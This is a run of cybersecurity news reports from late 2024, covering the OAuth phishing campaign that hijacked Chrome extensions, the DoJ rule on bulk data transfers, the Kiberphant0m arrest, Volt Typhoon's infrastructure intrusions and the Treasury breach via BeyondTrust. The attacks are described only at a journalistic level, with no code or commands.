New details have emerged about a phishing campaign targeting Chrome browser extension developers that led to the compromise of at least thirty-five extensions to inject data-stealing code, including those from cybersecurity firm Cyberhaven.

Although initial reports focused on Cyberhaven’s security-focused extension, subsequent investigations revealed that the same code had been injected into at least 35 extensions collectively used by roughly 2,600,000 people.

From reports on LinkedIn and Google Groups from targeted developers, the latest campaign started around December 5th, 2024. However, earlier command and control subdomains found by BleepingComputer existed as far back as March 2024.

“I just wanted to alert people to a more sophisticated phishing email than usual that we got that stated a Chrome Extension policy violation of the form: ‘Unnecessary details in the description’,” reads the post to Google Group’s Chromium Extension’s group.

“The link in this email looks like the webstore but goes to a phishing website that will try to take control of your chrome extension and likely update it with malware.”

A deceptive OAuth attack chain

The attack begins with a phishing email sent to Chrome extension developers directly or through a support email associated with their domain name.

From emails seen by BleepingComputer, the following domains were used in this campaign to send the phishing emails:

supportchromestore.com
forextensions.com
chromeforextension.com

The phishing email, which is made to appear as if it comes from Google, claims that the extension is in violation of Chrome Web Store policies and is at risk of being removed.  

“We do not allow extensions with misleading, poorly formatted, non-descriptive, irrelevant, excessive, or inappropriate metadata, including but not limited to the extension description, developer name, title, icon, screenshots, and promotional images,” reads the phishing email.

Specifically, the extension’s developer is led to believe their software’s description contains misleading information and must agree to the Chrome Web Store policies.

If the developer clicks on the embedded ‘Go To Policy’ button in an effort to understand what rules they have violated, they are taken to a legitimate login page on Google’s domain for a malicious OAuth application.

The page is part of Google’s standard authorization flow, designed for securely granting permissions to third-party apps to access specific Google account resources.

On that platform, the attacker hosted a malicious OAuth application named “Privacy Policy Extension” that asked the victim to grant permission to manage Chrome Web Store extensions through their account.

“When you allow this access, Privacy Policy Extension will be able to: See, edit, update, or publish your Chrome Web Store extensions, themes, apps, and licenses you have access to,” reads the OAuth authorization page.

Multi-factor authentication didn’t help protect the account as direct approvals in OAuth authorization flows aren’t required, and the process assumes the user fully understands the scope of permissions they’re granting.

“The employee followed the standard flow and inadvertently authorized this malicious third-party application,” explains Cyberhaven in a post-mortem writeup.

“The employee had Google Advanced Protection enabled and had MFA covering his account. The employee did not receive an MFA prompt. The employee’s Google credentials were not compromised.”

Once the threat actors gained access to the extension developer’s account, they modified the extension to include two malicious files, namely ‘worker.js’ and ‘content.js,’ which contained code to steal data from Facebook accounts.

The hijacked extension was then published as a “new” version on the Chrome Web Store.

While Extension Total is tracking thirty-five extensions impacted by this phishing campaign, IOCs from the attack indicate that a far greater number were targeted.

According to VirusTotal, the threat actors pre-registered domains for targeted extensions, even if they did not fall for the attack.

While most domains were created in November and December, BleepingComputer found that the threat actors were testing this attack in March 2024.

Targeting Facebook business accounts

Analysis of compromised machines showed that the attackers were after the Facebook accounts of users of the poisoned extensions.

Specifically, the data-stealing code attempted to grab the user’s Facebook ID, access token, account info, ad account information, and business accounts.

Additionally, the malicious code added a mouse click event listener specifically for the victim’s interactions on Facebook.com, looking for QR code images related to the platform’s two-factor authentication or CAPTCHA mechanisms.

This aimed to bypass 2FA protections on the Facebook account and allow the threat actors to hijack it.

The stolen information would be packaged together with Facebook cookies, the user agent string, Facebook ID, and the mouse click events and exfiltrated to the attacker’s command and control (C2) server.

Threat actors have been targeting Facebook business accounts via various attack pathways to make direct payments from the victim’s credit to their account, run disinformation or phishing campaigns on the social media platform, or monetize their access by selling it to others.

Dec 31, 2024Ravie LakshmananData Security / Privacy

The U.S. Department of Justice (DoJ) has issued a final rule carrying out Executive Order (EO) 14117, which prevents mass transfer of citizens’ personal data to countries of concern such as China (including Hong Kong and Macau), Cuba, Iran, North Korea, Russia, and Venezuela.

“This final rule is a crucial step forward in addressing the extraordinary national security threat posed of our adversaries exploiting Americans’ most sensitive personal data,” said Assistant Attorney General Matthew G. Olsen of the Justice Department’s National Security Division.

“This powerful new national-security program is designed to ensure that Americans’ personal data is no longer permitted to be sold to hostile foreign powers, whether through outright purchase or other means of commercial access.”

Back in February 2024, U.S. President Joe Biden signed an executive order to address the national risk posed by unauthorized access to Americans’ sensitive personal and government-related data for malicious activities, such as espionage, influence, kinetic, or cyber operations.

Furthermore, the order noted that the countries of concern can leverage their access to bulk data to develop or refine artificial intelligence and other advanced technologies, as well as purchase such information from commercial data brokers and other companies.

“Countries of concern and covered persons can also exploit this data to collect information on activists, academics, journalists, dissidents, political opponents, or members of nongovernmental organizations or marginalized communities to intimidate them; curb political opposition; limit freedoms of expression, peaceful assembly, or association; or enable other forms of suppression of civil liberties,” the DoJ said.

The rule issued by the DoJ is expected to become effective in 90 days. It identifies certain classes of prohibited, restricted, and exempt transactions; sets bulk thresholds for triggering the rule’s prohibitions and restrictions on covered data transactions involving bulk sensitive personal data; and establishes enforcement mechanisms such as civil and criminal penalties.

This covers data spanning six categories: personal identifiers (e.g., Social Security numbers, driver’s license etc.), precise geolocation data, biometric identifiers, human ‘omic (genomic, epigenomic, proteomic, and transcriptomic) data, personal health data, and personal financial data.

However, it bears noting that the rule neither imposes data localization requirements, nor does it prohibit U.S. citizens from conducting medical, scientific, or other research in countries of concern.

“The final rule also does not broadly prohibit U.S. persons from engaging in commercial transactions, including exchanging financial and other data as part of the sale of commercial goods and services with countries of concern or covered persons, or impose measures aimed at a broader decoupling of the substantial consumer, economic, scientific, and trade relationships that the United States has with other countries,” the DoJ said.

Federal authorities have arrested and indicted a 20-year-old U.S. Army soldier on suspicion of being Kiberphant0m, a cybercriminal who has been selling and leaking sensitive customer call records stolen earlier this year from AT&T and Verizon. As first reported by KrebsOnSecurity last month, the accused is a communications specialist who was recently stationed in South Korea.

One of several selfies on the Facebook page of Cameron Wagenius.

Cameron John Wagenius was arrested near the Army base in Fort Hood, Texas on Dec. 20, after being indicted on two criminal counts of unlawful transfer of confidential phone records.

The sparse, two-page indictment (PDF) doesn’t reference specific victims or hacking activity, nor does it include any personal details about the accused. But a conversation with Wagenius’ mother — Minnesota native Alicia Roen — filled in the gaps.

Roen said that prior to her son’s arrest he’d acknowledged being associated with Connor Riley Moucka, a.k.a. “Judische,” a prolific cybercriminal from Canada who was arrested in late October for stealing data from and extorting dozens of companies that stored data at the cloud service Snowflake.

In an interview with KrebsOnSecurity, Judische said he had no interest in selling the data he’d stolen from Snowflake customers and telecom providers, and that he preferred to outsource that to Kiberphant0m and others. Meanwhile, Kiberphant0m claimed in posts on Telegram that he was responsible for hacking into at least 15 telecommunications firms, including AT&T and Verizon.

On November 26, KrebsOnSecurity published a story that followed a trail of clues left behind by Kiberphantom indicating he was a U.S. Army soldier stationed in South Korea.

An 18-year-old Cameron Wagenius, joining the U.S. Army.

Ms. Roen said Cameron worked on radio signals and network communications at an Army base in South Korea for the past two years, returning to the United States periodically. She said Cameron was always good with computers, but that she had no idea he might have been involved in criminal hacking.

“I never was aware he was into hacking,” Roen said. “It was definitely a shock to me when we found this stuff out.”

Ms. Roen said Cameron joined the Army as soon as he was of age, following in his older brother’s footsteps.

“He and his brother when they were like 6 and 7 years old would ask for MREs from other countries,” she recalled, referring to military-issued “meals ready to eat” food rations. “They both always wanted to be in the Army. I’m not sure where things went wrong.”

Immediately after news broke of Moucka’s arrest, Kiberphant0m posted on the hacker community BreachForums what they claimed were the AT&T call logs for President-elect Donald J. Trump and for Vice President Kamala Harris.

“In the event you do not reach out to us @ATNT all presidential government call logs will be leaked,” Kiberphant0m threatened, signing their post with multiple “#FREEWAIFU” tags. “You don’t think we don’t have plans in the event of an arrest? Think again.”

Kiberphant0m posting what he claimed was a “data schema” stolen from the NSA via AT&T.

On that same day, Kiberphant0m posted what they claimed was the “data schema” from the U.S. National Security Agency.

On Nov. 5, Kiberphant0m offered call logs stolen from Verizon’s push-to-talk (PTT) customers — mainly U.S. government agencies and emergency first responders. On Nov. 9, Kiberphant0m posted a sales thread on BreachForums offering a “SIM-swapping” service targeting Verizon PTT customers. In a SIM-swap, fraudsters use credentials that are phished or stolen from mobile phone company employees to divert a target’s phone calls and text messages to a device they control.

The profile photo on Wagenius’ Facebook page was deleted within hours of my Nov. 26 story identifying Kiberphant0m as a likely U.S. Army soldier. Still, many of his original profile photos remain, including several that show Wagenius in uniform while holding various Army-issued weapons.

Several profile photos visible on the Facebook page of Cameron Wagenius.

November’s story on Kiberphant0m cited his own Telegram messages saying he maintained a large botnet that was used for distributed denial-of-service (DDoS) attacks to knock websites, users and networks offline. In 2023, Kiberphant0m sold remote access credentials for a major U.S. defense contractor.

Allison Nixon, chief research officer at the New York-based cybersecurity firm Unit 221B, helped track down Kiberphant0m’s real life identity. Nixon was among several security researchers who faced harassment and specific threats of violence from Judische and his associates.

“Anonymously extorting the President and VP as a member of the military is a bad idea, but it’s an even worse idea to harass people who specialize in de-anonymizing cybercriminals,” Nixon told KrebsOnSecurity. She said the investigation into Kiberphant0m shows that law enforcement is getting better and faster at going after cybercriminals — especially those who are actually living in the United States.

“Between when we, and an anonymous colleague, found his opsec mistake on November 10th to his last Telegram activity on December 6, law enforcement set the speed record for the fastest turnaround time for an American federal cyber case that I have witnessed in my career,” she said.

Nixon asked to share a message for all the other Kiberphant0ms out there who think they can’t be found and arrested.

“I know that young people involved in cybercrime will read these articles,” Nixon said. “You need to stop doing stupid shit and get a lawyer. Law enforcement wants to put all of you in prison for a long time.”

The indictment against Wagenius was filed in Texas, but the case has been transferred to the U.S. District Court for the Western District of Washington in Seattle.

The Chinese government’s intrusions into America’s telecommunications and other critical infrastructure networks this year appears to signal a shift from cyberspying as usual to prepping for destructive attacks.

The FBI and other US federal agencies rang in 2024 boasting about disrupting a Chinese botnet composed of “hundreds” of outdated routers intent on breaking into US critical infrastructure facilities. Spoiler alert: the botnet is back.

This same government-backed crew also compromised at least one large US city’s emergency services network, and has been conducting reconnaissance and enumeration of “multiple” American electric companies since early 2023.

Soon after these intrusions came to light, the Feds began issuing very public alerts that Volt Typhoon was preparing to “wreak havoc” on American infrastructure and “cause societal chaos” in the US. 

“Volt Typhoon’s choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the US authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable lateral movement to OT assets to disrupt functions,” the government agencies warned. 

The public learned later in the year that another Beijing hacking unit, this one called Salt Typhoon, had broken into American telecommunications networks in what one senior US senator called the “worst telecom hack in our nation’s history – by far.”

According to government and infosec sources, the attacks remain ongoing.

“We cannot say with certainty that the adversary has been evicted, because we still don’t know the scope of what they’re doing,” Jeff Greene, CISA’s executive assistant director for cybersecurity, told reporters during a Salt Typhoon briefing in early December.

‘Every org should be put on notice’

“Every organization should look at this as being put on notice that there are hostile nation state entities,” CrowdStrike Senior VP of Counter Adversary Operations Adam Meyers told The Register. “If you are involved in any degree of business that ties into the broader international ecosystem, or you’re providing services that are of logistical importance for critical infrastructure, you’re in the line of fire.” 

CrowdStrike tracks 63 different China-linked groups, and about two dozen of these are currently active, according to Meyers. In November, Meyers testified before a Senate committee on how the cyberthreats from the Middle Kingdom have evolved over the past two decades. 

Prior to 2015, these tended to be “smash-and-grab” raids, he said, noting that over the years, they have become more targeted intrusions that focus on high-value individuals and information: sources of political and military secrets, and intellectual property that can advance China’s national interests.

Even more worrisome is that at least one of these state-sponsored groups, Volt Typhoon, which CrowdStrike tracks as “Vanguard Panda,” appears to be pre-positioning deep inside American critical infrastructure networks so it’s ready for disruptive or destructive attacks preceding or coinciding with military activities.

“The reason that Vanguard Panda attracted so much attention was that it was the first time that there was a demonstrable aspect of pre-positioning,” Meyers said during an interview. “This would be like if the Russians, back in the ’60s, thought they were  going to invade the United States. Their pre-positioning would be to hide caches of weapons and resources that they could access as they mounted their invasion across the US.”

This would be like if the Russians, back in the ’60s, were  going to invade. Their pre-positioning would be to hide caches of weapons they could access as they mounted their invasion across the US

Plus, it’s unlikely that blowing up the botnet earlier this year did anything to disrupt the larger organization, or its future plans, he added.

“Disrupting that did not impact Vanguard Panda,” Meyers said. “It did not impact their ability to access the targets that they had gained access to and were continuing to maintain persistence.”

He said he’s doubtful that Volt Typhoon/Vanguard Panda was even running the botnet infrastructure. “That was likely another group that was tasked with providing communications infrastructure, and when that got disrupted, you would have to expect that there would have been a secondary path that would have been on standby,” Meyers noted. “They’re not going to just leave things to chance. If there’s a primary mechanism that they’re using, then they want a secondary and a tertiary one.” 

Before implanting the KV botnet malware on routers and other devices, Volt Typhoon has to break in, which usually involved exploiting bugs in firewalls, VPN appliances, and web servers, or abusing misconfigurations or weak – sometimes non-existent – passwords in these products.

Volt Typhoon’s post-exploitation activity

Tenable last month published a list of some of the CVEs that the crew has exploited in the past to gain initial access. These include a vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVPN software that allows a remote, unauthenticated attacker to upload a file to any location on the filesystem (CVE-2021-27860), a critical authentication bypass flaw in Zoho ManageEngine ADSelfService Plus (CVE-2021-40539), two critical heap-based buffer overflow bugs in Fortinet FortiOS and FortiProxy (CVE-2022-42475 and CVE-2023-27997) and a file upload flaw in Versa Director SD-WAN (CVE-2024-39717). 

Lumen Technologies’ Black Lotus Labs in August warned that Volt Typhoon was abusing the Versa vulnerability CVE-2024-39717 to plant custom, credential-harvesting web shells on customers’ networks and noted that these attacks are “likely ongoing” against unpatched systems.

“What’s unique about Volt Typhoon is the post-exploitation activity,” Tenable research engineer Scott Caveza told The Register. It doesn’t use custom malware, which can be more easily spotted by antivirus software, but instead uses legitimate software products and credentials to snoop around and avoid detection. 

These include Windows tools (cmd.exe, netsh, and PowerShell) for command execution and lateral movement, Mimikatz to extract credentials from memory, Remote Desktop Protocol (RDP) to burrow deeper into internal systems, and Windows Task Scheduler to establish scheduled tasks for regular, persistent access.

“Just executing normal commands and binaries that would be found on a Windows system to do reconnaissance, and further their way through the network,” Caveza said. “It’s very stealth activity, and really speaks to the skill this group has at evading security software suites and making the traffic look seemingly normal.”

In addition to Volt Typhoon and some of the other Chinese government groups using stealthy, so-called “living-off-the-land” techniques, another noteworthy aspect of their ongoing operations targeting critical industries is the US government’s very loud response to the attacks. 

Caught in the cookie jar

Not only did the FBI, CISA, and other government agencies sound the alarm on the Chinese intruders, but they also published a threat hunting guide and listed actions to mitigate Volt Typhoon activity, including patching internet-facing systems, using phishing-resistant multi-factor authentication, and ditching outdated gear that is no longer supported by the manufacturer.

“Number one, kudos to our government,” ZeroFox VP of Intelligence Adam Darrah told The Register. “I do applaud the United States government for being more bold in publicizing these campaigns and saying here’s how to prevent this being an issue. It’s a way to crowdsource national defense.”

While every major intelligence agency in the world spies on adversarial – and sometimes even friendly – government, China’s cyberoperations this year should be a “wake-up call” to people, Darrah added. 

“China has historically been very careful and good about not getting publicly caught with their hand in the American military cookie jar,” he said. “So what was interesting to me: Number one they got caught. Number two: it was publicized. And number three: I’m happy to see this, because it’s time to stop pretending China is this peaceful country that only wants to steal our IP for economic and trade reasons. That’s not true.”

Rafe Pilling, director of threat intelligence for the Secureworks counter threat unit, also highlighted the US government’s efforts to encourage people to mitigate the threat posed by Volt Typhoon. And now only “the threat that has been posed today” with the targeted reconnaissance and espionage activities, “but perhaps more about the threat posed in the future – the wider, unknown activity that might be out there.”

“This includes the pre-positioning warnings and readying for future attacks.”

Piling’s team covers the gamut of threat groups, from financially motivated cybercrime organizations to nation-state attackers, and China “consistently tops our list of state sponsored actors,” he told The Register.

The first cases that Securworks now attributes to Volt Typhoon (it tracks this crew as Bronze Silhouette) occurred in June and September 2021.

But at the time, “we had a number of incidents we responded to for customers involving that threat group that we just had a question mark over,” Piling said. “They didn’t fall into any of the other buckets we tracked, so we out a question mark, ‘China?’ over those incidents.”

It was only years later, after information sharing efforts with public and private researchers, “that you see there is this wider set of activities targeting organizations in mainland United States all the way out to telcos in Guam,” he added. 

But even back in 2021, “the activity we saw certainly looked like access-type operations,” Piling said. “Once you get past the access stage, you can achieve a number of intents, everything from espionage to pre-positioning for disruptive operations. And they’re not mutually exclusive.”

While security and incident response firms get called in after an attack has occurred, the defenders on the front lines are those working in the water, electric grid, oil and gas, and other critical sectors.

Front-line defenders

These are among operational technology (OT) security Xona Systems’ customers, and the consensus is: “There’s a lot more that could be done to protect critical infrastructure,” COO Bill Cantrell told The Register. “The overriding theme is that there’s just not enough funding.”

The biggest concern among critical infrastructure owners and operators continues to be physical safety and reliability. “Those things have always been at the forefront in this industry, Cantrell said. “There’s a lot of very dangerous, high-power equipment and so it’s making sure it’s reliable, it’s safe, and there are good backup procedures.”

These are very real concerns. Critical systems providing drinking water or heat can’t fail without potential life-and-death consequences, and shutting down these systems to update or patch security flaws introduces a raft of physical-world risks.

Over the last several years, however, there have been added concerns around network connectivity and remote access as more OT and IoT devices and systems become connected to the internet. 

“It’s a new vector of pressure that has been put on these OT folks,” Cantrell said. “It’s a world where the OT guys don’t understand the networking and cyber issues, and the IT guys don’t really understand all of the constraints around safety and reliability that go along with these OT networks.”

The most important thing that critical industries should be doing is to modernize secure access to remote infrastructure, according to Cantrell. “That’s where most of these breaches come from is through stolen credentials, VPNs, older jump boxes,” he said, adding that visibility is another key piece. “Half the time, they don’t even know everything that is on the network.”

And it’s a lot to deal with for an org using legacy OT gear and trying to get up to speed on IT concepts like zero-trust access while facing down attempted attacks from ransomware crews and nation-states on a daily basis. 

“The scary thing is that some of these threats may be laying in wait and dormant right now,” Cantrell said. “They may be doing some intel collection and possibly laying in wait to trigger actions when they feel it’s necessary.”

He echoed CISA and the FBI’s alerts of late about it being incredibly hard to kick intruders off of critical networks when you don’t know they are there in the first place. “Some of them may be compromised, and they may not even know it.” ®

The Department of Treasury was notified earlier this month that several of its workstations were hacked by a group believed to be linked to China, the department confirmed to CyberScoop.

According to a letter sent Monday to leaders on the Senate Committee on Banking, Housing and Urban Affairs and obtained by CyberScoop, the compromises occurred through third-party software provider BeyondTrust, which provides identity and access management security solutions.

Treasury officials were notified by BeyondTrust on Dec. 8 that “a threat actor had gained access to a key used by the vendor to secure a cloud-based service used to remotely provide technical support for Treasury Departmental Offices end users,” the letter states.

“With access to the stolen key, the threat actor was able to override the service’s security, remotely access certain Treasury DO user workstations, and access certain unclassified documents maintained by those users,” wrote Aditi Hardikar, Treasury’s assistant secretary for management.

In a statement sent to CyberScoop, a BeyondTrust spokesperson said the company first noticed anomalous activity on Dec. 2 and confirmed on Dec. 5 affecting a “limited” number of remote support SaaS customers. The company said it posted an advisory about the incident on Dec. 8, and the timeline indicates that all identified instances were patched as of of Dec. 16.

“No other BeyondTrust products were involved. Law enforcement was notified and BeyondTrust has been supporting the investigative efforts,” the statement said.

Hardikar wrote that the hacks are being classified as a “major incident” under the Federal Information Security and Modernization Act, and the department has been working with the Cybersecurity and Infrastructure Security Agency, the FBI, intelligence agencies, and third-party forensic investigators to scope out the full impact.

“Based on available indicators, the incident has been attributed to a China state-sponsored Advanced Persistent Threat actor,” Hardikar wrote.

In response to questions, a Treasury spokesperson said the threat actor was able to remotely access “several” Treasury user workstations as well as “certain unclassified documents” maintained by those users. The unnamed BeyondTrust service was taken offline and the department believes the actor no longer has access to Treasury systems or information.

News of the hacks was first reported by Barron’s and Agency France-Presse.

The incident comes as Washington policymakers are still reeling from a wide-ranging compromise of U.S. telecommunications infrastructure by Salt Typhoon, a hacking group linked to the Chinese government. Those compromises gave Beijing broad access to the phones and communications of high-ranking U.S. officials, including reportedly, incoming President-elect Donald Trump and Vice President-elect JD Vance.

This week, the White House said that while fewer than 100 individuals are believed to have been directly impacted by the Salt Typhoon intrusions, a larger group centered around Washington D.C. may have had their geolocation data stolen, something that could potentially allow Chinese intelligence agencies to identify the phones of additional targets.

UPDATE: This story was updated on Dec. 30 to include a statement from a BeyondTrust spokesperson.

The US Department of the Treasury alerted lawmakers on Monday that Chinese state-backed threat actors were able compromise its systems and steal data from workstations earlier this month.

Because an advanced persistent threat (APT) group is suspected to be behind the hack, it is being treated as a “major cybersecurity incident,” the disclosure letter from the US Department of Treasury said, which was sent to the chairman and ranking member of the Senate committee which oversees the agency.

It explained the adversaries broke into Treasury through a third-party cybersecurity vendor, BeyondTrust, and “…gained access to a remote key used by the vendor to secure a cloud-based service used to remotely provide technical support for Treasury Departmental Offices (DO) end users,” the letter said. “With access to the stolen key, the threat actor was able to override the service’s security, remotely access certain Treasury DO user workstations, and access certain unclassified documents maintained by those users.”

The BeyondTrust website said the company has more than 20,000 customers across more than 100 countries who use its privileged remote access tools. The site adds BeyondTrust is used among 75% of Fortune 100 organizations. The company has not responded to Dark Reading’s request for comment.

Treasury added it was told by BeyondTrust about the issue on Dec. 8 and, along with the Cybersecurity and Infrastructure Security Agency (CISA) and the FBI are investigating the compromise, according to the letter.

A BeyondTrust advisory said the company was alerted on Dec. 5 to a compromised API key, which was immediately revoked. Impacted customers have already been notified and the company is working with them on remediation, according to a statement from a BeyondTrust spokesperson.

“BeyondTrust previously identified and took measures to address a security incident in early December 2024 that involved the Remote Support product,” the statement said. “No other BeyondTrust products were involved.”

‘Epic’ Chinese Hack of US Treasury

The revelation that Beijing was able to strike right at the heart of America’s federal capitalist system itself comes as the federal government is still grappling with the sprawling and coordinated Chinese-backed cyberattacks against telecommunications companies in the US. Once inside, hackers from groups including Salt Typhoon accessed call data and text messages of an unknown number of Americans. So far, Chinese hacking groups have been discovered inside at least nine different telecom networks in the US.

While investigations into the US Treasury breach are ongoing, these brazen Chinese acts of cyber espionage are almost to certain to require dicey diplomatic maneuvering. That could prove to be difficult to pull off during the murky transition period from the Biden administration to the incoming Trump administration.

“Beijing’s routine denial of responsibility for cyberespionage incidents raises diplomatic challenges with the US in addressing such breaches effectively since there’s lack of transparency and accountability/coordination,” Lawrence Pingree, vice president of Dispersive said in a statement provided to Dark Reading.

He added that it’s still unclear whether the Chinese hackers were able to crack the application’s secrets, or a cryptographic key.

“Secrets and cryptographic key management are critical elements of managing software API access and thus if deficient in some way, or a compromise occurs via a developer’s endpoint, the breach of those secrets and authentication keys can create these types of epic breaches,” he added.

The breach also shows that cybersecurity vendors remain a favorite targets of sophisticated state threat actors, according to former NSA cyber expert Evan Dornbush, who provided a statement in reaction to the breach.

“The cybersecurity world is reeling from yet another high-profile breach, this time targeting the clients of security vendor BeyondTrust,” Dornbush said. “This incident joins a growing list of attacks on security firms, including Okta (whose breach directly impacted BeyondTrust as a customer), LastPass, SolarWinds, and Snowflake.”